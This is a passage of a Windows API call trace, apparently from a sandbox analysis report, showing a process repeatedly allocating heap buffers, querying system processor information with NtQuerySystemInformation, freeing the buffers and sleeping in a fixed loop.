RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.814] Sleep (dwMilliseconds=0x110) [0232.826] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.826] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.827] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.831] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.831] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.832] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.832] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.833] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.833] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.833] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.833] Sleep (dwMilliseconds=0x110) [0232.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.845] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.846] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.847] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.847] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.848] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.848] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.848] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.849] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.849] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.850] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.850] Sleep (dwMilliseconds=0x110) [0232.857] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.857] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.863] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.863] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.864] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.864] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.865] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.865] Sleep (dwMilliseconds=0x110) [0232.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.876] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.876] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.878] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.878] Sleep (dwMilliseconds=0x110) [0232.891] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.891] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.893] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.893] Sleep (dwMilliseconds=0x110) [0232.906] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.906] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.907] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.907] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.907] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.907] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.907] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.907] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.909] Sleep (dwMilliseconds=0x110) [0232.923] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.923] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.925] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.925] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.926] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.926] Sleep (dwMilliseconds=0x110) [0232.937] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.938] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.938] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.938] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.938] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.941] Sleep (dwMilliseconds=0x110) [0232.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.954] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.954] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.956] Sleep (dwMilliseconds=0x110) [0232.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.970] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.971] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.971] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.971] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.971] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.971] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.972] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.973] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.973] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.974] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.974] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.975] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.975] Sleep (dwMilliseconds=0x110) [0232.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.987] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.988] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.988] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.988] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.989] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.989] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.989] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.989] Sleep (dwMilliseconds=0x110) [0233.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.004] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.004] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.005] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.005] Sleep (dwMilliseconds=0x110) [0233.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.019] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.020] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.020] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.022] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.022] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.022] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.023] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.023] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.023] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.023] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.051] Sleep (dwMilliseconds=0x110) [0233.062] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.062] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.063] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.063] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.064] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.064] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.064] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.064] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.064] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.064] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, 